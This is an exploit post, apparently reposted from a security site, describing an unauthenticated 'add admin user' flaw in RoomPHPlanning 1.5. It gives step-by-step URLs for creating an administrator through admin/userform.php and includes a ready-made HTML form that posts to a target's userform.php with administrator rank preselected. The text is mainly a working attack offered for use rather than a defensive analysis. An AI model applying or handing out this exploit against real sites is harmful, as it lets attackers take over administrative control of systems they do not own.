RoomPHPlanning 1.5 Arbitrary Add Admin User Vulnerability

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

RoomPHPlanning 1.5 Arbitrary Add Admin User Vulnerability

来源：www.vfcocus.net 作者：Stack 发布时间：2008-05-27

###########################################
{+} RoomPHPlanning v1.5 remote Arbitrary Add Admin Users Vulnerability
{+} Script download :http://www.beaussier.com/roomphplanning/telecharge.php
{+} Founded by : Stack
{+} Greetz : All friends & muslims HaCkeRs...
###########################################
DESCRIPTION:
RoomPHPlanning is vulnerable to add user whit go to link [see down]
in colon Nom write any name and in colon login whrite your adress email after password
and the colon priviléges is adminstrator after click [enregistrer ]
Vulnerability:
go to this link for add admin user
1 : http://localhost/path/admin/userform.php
go this link for login in
2 : http://localhost/path/login.php
after login in go to admin link
3 : http://localhost/path/admin/
for see all administrator & edit it
4 : http://localhost/path/admin/?user=1
after execute the command for add user or for login in the page is not changed
it's necessary go to second link 1 2 3 4

EXPLOIT HTML :
-------------------------------------------------------------------------------------
<HTML>
<HEAD>
<TITLE>RoomPHPlanning add Admin user</TITLE>
<LINK REL="stylesheet" TYPE="text/css" HREF="style.css">
</HEAD>
<BODY>
<form action="http://site.com/path/admin/userform.php" method="POST">
<FORM ACTION="#" METHOD="POST">
<INPUT TYPE="HIDDEN" NAME="save" VALUE="1">
<TABLE WIDTH=98% BORDER=0 CELLPADDING=4 CELLSPACING=0>
<TR VALIGN=TOP>
<TD WIDTH=50%><P>Nom</P></TD>
<TD WIDTH=50%><INPUT TYPE=TEXT NAME='name' SIZE=40 VALUE=""></TD>
<TR VALIGN=TOP>
<TD WIDTH=50%><P>Login email</P></TD>
<TD WIDTH=50%><INPUT TYPE=TEXT NAME='login' SIZE=40 VALUE=""></TD>
<TR VALIGN=TOP>
<TD WIDTH=50%><P>Mot de passe</P></TD>
<TD WIDTH=50%><INPUT TYPE=TEXT NAME='pwd' SIZE=20></TD></TR>
</TR><TR VALIGN=TOP>
<TD WIDTH=50%><P>Privilèges</P></TD><TD WIDTH=50%><SELECT NAME="rank">
<OPTION VALUE="1">Administrateur</OPTION>
<OPTION VALUE="2">Utilisateur de base</OPTION>
<OPTION VALUE="3">Utilisateur normal</OPTION>
<OPTION VALUE="4">Anonyme</OPTION>
<OPTION VALUE="5">Super utilisateur</OPTION>
<OPTION VALUE="6">Gestionnaire</OPTION>
</SELECT>
</TD>
</TR><TR><TD COLSPAN=2 WIDTH=100% VALIGN=TOP><CENTER><BR>
<INPUT TYPE="SUBMIT" VALUE="Enregistrer">
<INPUT TYPE="BUTTON" VALUE="Annuler" ONCLICK="javascript:window.close();">
</TD></TR></TABLE></FORM></BODY>
</HTML>
-------------------------------------------------------------------------------------

GREETZ: http://real-hack.com
-----------------------------------------------------------------------------

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告